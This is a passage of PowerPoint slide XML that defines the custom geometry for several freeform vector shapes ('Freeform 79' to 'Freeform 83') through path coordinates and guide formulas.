                  <a:gd name="T58" fmla="*/ 142 w 599"/>
                  <a:gd name="T59" fmla="*/ 163 h 631"/>
                  <a:gd name="T60" fmla="*/ 168 w 599"/>
                  <a:gd name="T61" fmla="*/ 158 h 631"/>
                  <a:gd name="T62" fmla="*/ 226 w 599"/>
                  <a:gd name="T63" fmla="*/ 168 h 631"/>
                  <a:gd name="T64" fmla="*/ 252 w 599"/>
                  <a:gd name="T65" fmla="*/ 179 h 631"/>
                  <a:gd name="T66" fmla="*/ 357 w 599"/>
                  <a:gd name="T67" fmla="*/ 242 h 631"/>
                  <a:gd name="T68" fmla="*/ 383 w 599"/>
                  <a:gd name="T69" fmla="*/ 252 h 631"/>
                  <a:gd name="T70" fmla="*/ 404 w 599"/>
                  <a:gd name="T71" fmla="*/ 257 h 631"/>
                  <a:gd name="T72" fmla="*/ 446 w 599"/>
                  <a:gd name="T73" fmla="*/ 236 h 631"/>
                  <a:gd name="T74" fmla="*/ 462 w 599"/>
                  <a:gd name="T75" fmla="*/ 216 h 631"/>
                  <a:gd name="T76" fmla="*/ 472 w 599"/>
                  <a:gd name="T77" fmla="*/ 195 h 631"/>
                  <a:gd name="T78" fmla="*/ 467 w 599"/>
                  <a:gd name="T79" fmla="*/ 168 h 631"/>
                  <a:gd name="T80" fmla="*/ 446 w 599"/>
                  <a:gd name="T81" fmla="*/ 142 h 631"/>
                  <a:gd name="T82" fmla="*/ 415 w 599"/>
                  <a:gd name="T83" fmla="*/ 121 h 631"/>
                  <a:gd name="T84" fmla="*/ 399 w 599"/>
                  <a:gd name="T85" fmla="*/ 121 h 631"/>
                  <a:gd name="T86" fmla="*/ 352 w 599"/>
                  <a:gd name="T87" fmla="*/ 142 h 631"/>
                  <a:gd name="T88" fmla="*/ 252 w 599"/>
                  <a:gd name="T89" fmla="*/ 63 h 631"/>
                  <a:gd name="T90" fmla="*/ 315 w 599"/>
                  <a:gd name="T91" fmla="*/ 315 h 631"/>
                  <a:gd name="T92" fmla="*/ 289 w 599"/>
                  <a:gd name="T93" fmla="*/ 299 h 631"/>
                  <a:gd name="T94" fmla="*/ 252 w 599"/>
                  <a:gd name="T95" fmla="*/ 284 h 631"/>
                  <a:gd name="T96" fmla="*/ 226 w 599"/>
                  <a:gd name="T97" fmla="*/ 279 h 631"/>
                  <a:gd name="T98" fmla="*/ 168 w 599"/>
                  <a:gd name="T99" fmla="*/ 305 h 631"/>
                  <a:gd name="T100" fmla="*/ 147 w 599"/>
                  <a:gd name="T101" fmla="*/ 326 h 631"/>
                  <a:gd name="T102" fmla="*/ 137 w 599"/>
                  <a:gd name="T103" fmla="*/ 352 h 631"/>
                  <a:gd name="T104" fmla="*/ 137 w 599"/>
                  <a:gd name="T105" fmla="*/ 373 h 631"/>
                  <a:gd name="T106" fmla="*/ 147 w 599"/>
                  <a:gd name="T107" fmla="*/ 399 h 631"/>
                  <a:gd name="T108" fmla="*/ 174 w 599"/>
                  <a:gd name="T109" fmla="*/ 415 h 631"/>
                  <a:gd name="T110" fmla="*/ 189 w 599"/>
                  <a:gd name="T111" fmla="*/ 420 h 631"/>
                  <a:gd name="T112" fmla="*/ 204 w 599"/>
                  <a:gd name="T113" fmla="*/ 426 h 631"/>
                  <a:gd name="T114" fmla="*/ 236 w 599"/>
                  <a:gd name="T115" fmla="*/ 426 h 631"/>
                  <a:gd name="T116" fmla="*/ 257 w 599"/>
                  <a:gd name="T117" fmla="*/ 415 h 631"/>
                  <a:gd name="T118" fmla="*/ 352 w 599"/>
                  <a:gd name="T119" fmla="*/ 326 h 631"/>
                  <a:gd name="T120" fmla="*/ 315 w 599"/>
                  <a:gd name="T121" fmla="*/ 315 h 6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599" h="631">
                    <a:moveTo>
                      <a:pt x="263" y="53"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="263" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="598" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="562" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="195"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="425" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="53"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="315" y="315"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="315" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="315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35" name="Freeform 79"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3165475" y="5565775"/>
                <a:ext cx="228600" cy="279400"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 447 w 636"/>
                  <a:gd name="T1" fmla="*/ 268 h 778"/>
                  <a:gd name="T2" fmla="*/ 452 w 636"/>
                  <a:gd name="T3" fmla="*/ 273 h 778"/>
                  <a:gd name="T4" fmla="*/ 520 w 636"/>
                  <a:gd name="T5" fmla="*/ 268 h 778"/>
                  <a:gd name="T6" fmla="*/ 551 w 636"/>
                  <a:gd name="T7" fmla="*/ 284 h 778"/>
                  <a:gd name="T8" fmla="*/ 583 w 636"/>
                  <a:gd name="T9" fmla="*/ 305 h 778"/>
                  <a:gd name="T10" fmla="*/ 630 w 636"/>
                  <a:gd name="T11" fmla="*/ 368 h 778"/>
                  <a:gd name="T12" fmla="*/ 635 w 636"/>
                  <a:gd name="T13" fmla="*/ 442 h 778"/>
                  <a:gd name="T14" fmla="*/ 620 w 636"/>
                  <a:gd name="T15" fmla="*/ 483 h 778"/>
                  <a:gd name="T16" fmla="*/ 557 w 636"/>
                  <a:gd name="T17" fmla="*/ 583 h 778"/>
                  <a:gd name="T18" fmla="*/ 510 w 636"/>
                  <a:gd name="T19" fmla="*/ 636 h 778"/>
                  <a:gd name="T20" fmla="*/ 415 w 636"/>
                  <a:gd name="T21" fmla="*/ 730 h 778"/>
                  <a:gd name="T22" fmla="*/ 331 w 636"/>
                  <a:gd name="T23" fmla="*/ 772 h 778"/>
                  <a:gd name="T24" fmla="*/ 294 w 636"/>
                  <a:gd name="T25" fmla="*/ 777 h 778"/>
                  <a:gd name="T26" fmla="*/ 221 w 636"/>
                  <a:gd name="T27" fmla="*/ 762 h 778"/>
                  <a:gd name="T28" fmla="*/ 189 w 636"/>
                  <a:gd name="T29" fmla="*/ 736 h 778"/>
                  <a:gd name="T30" fmla="*/ 147 w 636"/>
                  <a:gd name="T31" fmla="*/ 672 h 778"/>
                  <a:gd name="T32" fmla="*/ 137 w 636"/>
                  <a:gd name="T33" fmla="*/ 641 h 778"/>
                  <a:gd name="T34" fmla="*/ 142 w 636"/>
                  <a:gd name="T35" fmla="*/ 599 h 778"/>
                  <a:gd name="T36" fmla="*/ 0 w 636"/>
                  <a:gd name="T37" fmla="*/ 546 h 778"/>
                  <a:gd name="T38" fmla="*/ 609 w 636"/>
                  <a:gd name="T39" fmla="*/ 95 h 778"/>
                  <a:gd name="T40" fmla="*/ 210 w 636"/>
                  <a:gd name="T41" fmla="*/ 552 h 778"/>
                  <a:gd name="T42" fmla="*/ 205 w 636"/>
                  <a:gd name="T43" fmla="*/ 589 h 778"/>
                  <a:gd name="T44" fmla="*/ 226 w 636"/>
                  <a:gd name="T45" fmla="*/ 625 h 778"/>
                  <a:gd name="T46" fmla="*/ 242 w 636"/>
                  <a:gd name="T47" fmla="*/ 636 h 778"/>
                  <a:gd name="T48" fmla="*/ 284 w 636"/>
                  <a:gd name="T49" fmla="*/ 641 h 778"/>
                  <a:gd name="T50" fmla="*/ 305 w 636"/>
                  <a:gd name="T51" fmla="*/ 630 h 778"/>
                  <a:gd name="T52" fmla="*/ 404 w 636"/>
                  <a:gd name="T53" fmla="*/ 541 h 778"/>
                  <a:gd name="T54" fmla="*/ 457 w 636"/>
                  <a:gd name="T55" fmla="*/ 478 h 778"/>
                  <a:gd name="T56" fmla="*/ 488 w 636"/>
                  <a:gd name="T57" fmla="*/ 431 h 778"/>
                  <a:gd name="T58" fmla="*/ 494 w 636"/>
                  <a:gd name="T59" fmla="*/ 389 h 778"/>
                  <a:gd name="T60" fmla="*/ 473 w 636"/>
                  <a:gd name="T61" fmla="*/ 352 h 778"/>
                  <a:gd name="T62" fmla="*/ 457 w 636"/>
                  <a:gd name="T63" fmla="*/ 342 h 778"/>
                  <a:gd name="T64" fmla="*/ 420 w 636"/>
                  <a:gd name="T65" fmla="*/ 336 h 778"/>
                  <a:gd name="T66" fmla="*/ 399 w 636"/>
                  <a:gd name="T67" fmla="*/ 347 h 778"/>
                  <a:gd name="T68" fmla="*/ 294 w 636"/>
                  <a:gd name="T69" fmla="*/ 436 h 778"/>
                  <a:gd name="T70" fmla="*/ 242 w 636"/>
                  <a:gd name="T71" fmla="*/ 499 h 7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36" h="778">
                    <a:moveTo>
                      <a:pt x="609" y="95"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="447" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="520" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="630" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="635" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="620" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="594" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="756"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="772"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="772"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="777"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="777"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="762"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="736"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="736"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="704"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="95"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="210" y="552"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="210" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="589"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="609"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="625"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="636"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="641"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="488" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="342"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="552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36" name="Freeform 80"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3314700" y="5688013"/>
                <a:ext cx="212725" cy="242887"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 462 w 589"/>
                  <a:gd name="T1" fmla="*/ 236 h 673"/>
                  <a:gd name="T2" fmla="*/ 110 w 589"/>
                  <a:gd name="T3" fmla="*/ 672 h 673"/>
                  <a:gd name="T4" fmla="*/ 0 w 589"/>
                  <a:gd name="T5" fmla="*/ 577 h 673"/>
                  <a:gd name="T6" fmla="*/ 352 w 589"/>
                  <a:gd name="T7" fmla="*/ 147 h 673"/>
                  <a:gd name="T8" fmla="*/ 462 w 589"/>
                  <a:gd name="T9" fmla="*/ 236 h 673"/>
                  <a:gd name="T10" fmla="*/ 588 w 589"/>
                  <a:gd name="T11" fmla="*/ 89 h 673"/>
                  <a:gd name="T12" fmla="*/ 509 w 589"/>
                  <a:gd name="T13" fmla="*/ 184 h 673"/>
                  <a:gd name="T14" fmla="*/ 399 w 589"/>
                  <a:gd name="T15" fmla="*/ 95 h 673"/>
                  <a:gd name="T16" fmla="*/ 473 w 589"/>
                  <a:gd name="T17" fmla="*/ 0 h 673"/>
                  <a:gd name="T18" fmla="*/ 588 w 589"/>
                  <a:gd name="T19" fmla="*/ 89 h 6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89" h="673">
                    <a:moveTo>
                      <a:pt x="462" y="236"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="110" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="577"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="236"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="588" y="89"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="509" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="89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37" name="Freeform 81"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3387725" y="5743575"/>
                <a:ext cx="204788" cy="244475"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 567 w 568"/>
                  <a:gd name="T1" fmla="*/ 89 h 678"/>
                  <a:gd name="T2" fmla="*/ 115 w 568"/>
                  <a:gd name="T3" fmla="*/ 677 h 678"/>
                  <a:gd name="T4" fmla="*/ 0 w 568"/>
                  <a:gd name="T5" fmla="*/ 593 h 678"/>
                  <a:gd name="T6" fmla="*/ 451 w 568"/>
                  <a:gd name="T7" fmla="*/ 0 h 678"/>
                  <a:gd name="T8" fmla="*/ 567 w 568"/>
                  <a:gd name="T9" fmla="*/ 89 h 6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8" h="678">
                    <a:moveTo>
                      <a:pt x="567" y="89"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="115" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="567" y="89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38" name="Freeform 82"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3465513" y="5792788"/>
                <a:ext cx="198437" cy="252412"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 441 w 552"/>
                  <a:gd name="T1" fmla="*/ 242 h 699"/>
                  <a:gd name="T2" fmla="*/ 116 w 552"/>
                  <a:gd name="T3" fmla="*/ 698 h 699"/>
                  <a:gd name="T4" fmla="*/ 0 w 552"/>
                  <a:gd name="T5" fmla="*/ 614 h 699"/>
                  <a:gd name="T6" fmla="*/ 325 w 552"/>
                  <a:gd name="T7" fmla="*/ 158 h 699"/>
                  <a:gd name="T8" fmla="*/ 441 w 552"/>
                  <a:gd name="T9" fmla="*/ 242 h 699"/>
                  <a:gd name="T10" fmla="*/ 551 w 552"/>
                  <a:gd name="T11" fmla="*/ 84 h 699"/>
                  <a:gd name="T12" fmla="*/ 483 w 552"/>
                  <a:gd name="T13" fmla="*/ 184 h 699"/>
                  <a:gd name="T14" fmla="*/ 362 w 552"/>
                  <a:gd name="T15" fmla="*/ 100 h 699"/>
                  <a:gd name="T16" fmla="*/ 436 w 552"/>
                  <a:gd name="T17" fmla="*/ 0 h 699"/>
                  <a:gd name="T18" fmla="*/ 551 w 552"/>
                  <a:gd name="T19" fmla="*/ 84 h 6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52" h="699">
                    <a:moveTo>
                      <a:pt x="441" y="242"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="116" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="242"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="551" y="84"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="483" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="551" y="84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39" name="Freeform 83"/>
              <p:cNvSpPr>
